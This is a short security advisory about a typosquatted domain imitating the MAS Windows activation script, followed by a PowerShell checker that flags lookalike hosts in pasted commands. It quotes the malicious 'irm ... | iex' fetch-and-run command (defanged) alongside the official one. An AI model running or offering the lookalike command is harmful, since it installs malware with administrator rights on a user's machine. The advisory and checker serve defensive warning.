The well-known activation tool MAS offers a PowerShell command that allows users to load an activation script online and execute it instantly. Compared with downloading and running a separate utility, this online approach is undeniably convenient, although it requires users to manually type or paste the command each time. Because the script is fetched online, it relies on a domain name. The official MAS activation command—and the domain it uses—is as follows:
irm https://get.activated.win | iex
However, attackers have registered a deceptively similar domain to distribute malware:
irm hxxps://get.activate.win | iex
The difference is a single missing letter—just a “d”—which is easy to overlook when typing. As a result, some users may inadvertently execute the attacker’s counterfeit version. That fake script does, in fact, activate the system (MAS itself is open source), but at the same time it silently installs malicious software.
Because the MAS activation command must be run with administrator privileges, there is effectively nothing preventing an attacker from deploying malware once those privileges are granted. After executing the forged command, a system may end up hosting multiple malicious components and even become subject to remote control.
The MAS team has urged users to carefully verify the command before running it. When in doubt, they recommend visiting the official MAS website each time and copying the command directly, rather than typing it manually. Users should also remain alert to the possibility of fake MAS websites—although none have been confirmed so far.
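One way to automate the verification step described above, as an added example that is not part of MAS or of the original article: a PowerShell check that extracts the host from a pasted command and compares it with the official host quoted above. The function names and the edit-distance threshold of 2 are assumptions made for illustration.

```powershell
# Added example, not MAS code. Only the official host below comes from the article.
$OfficialHost = 'get.activated.win'

function Get-EditDistance {
    param([string]$A, [string]$B)
    # Levenshtein distance computed with two rolling rows.
    $prev = @(0..$B.Length)
    for ($i = 1; $i -le $A.Length; $i++) {
        $curr = New-Object 'int[]' ($B.Length + 1)
        $curr[0] = $i
        for ($j = 1; $j -le $B.Length; $j++) {
            $cost = if ($A[$i - 1] -ceq $B[$j - 1]) { 0 } else { 1 }
            $best = [Math]::Min($prev[$j] + 1, $curr[$j - 1] + 1)
            $curr[$j] = [Math]::Min($best, $prev[$j - 1] + $cost)
        }
        $prev = $curr
    }
    return $prev[$B.Length]
}

function Test-ActivationCommand {
    param([string]$Command)
    # Accept defanged schemes (hxxp/hxxps) so quoted samples can be checked too.
    $m = [regex]::Match($Command, '(?i)\bh(?:tt|xx)ps?://([^/\s|''"]+)')
    if (-not $m.Success) { return 'NoUrl' }
    $hostName = $m.Groups[1].Value.ToLowerInvariant()
    # Exact match only: anything else, including a port or userinfo, is not official.
    if ($hostName -ceq $OfficialHost) { return 'Official' }
    # Assumed threshold: hosts within two edits of the official one are lookalikes.
    if ((Get-EditDistance $hostName $OfficialHost) -le 2) { return 'Lookalike' }
    return 'Unknown'
}

# Constructed sample input: the two commands quoted in the article plus an unrelated one.
$samples = @(
    'irm https://get.activated.win | iex',
    'irm hxxps://get.activate.win | iex',
    'irm https://example.org/setup.ps1 | iex'
)
foreach ($s in $samples) {
    '{0,-10} {1}' -f (Test-ActivationCommand $s), $s
}
```

The check only inspects the text of the command and never fetches the URL, so it is safe to run on a suspicious string before deciding whether to execute it.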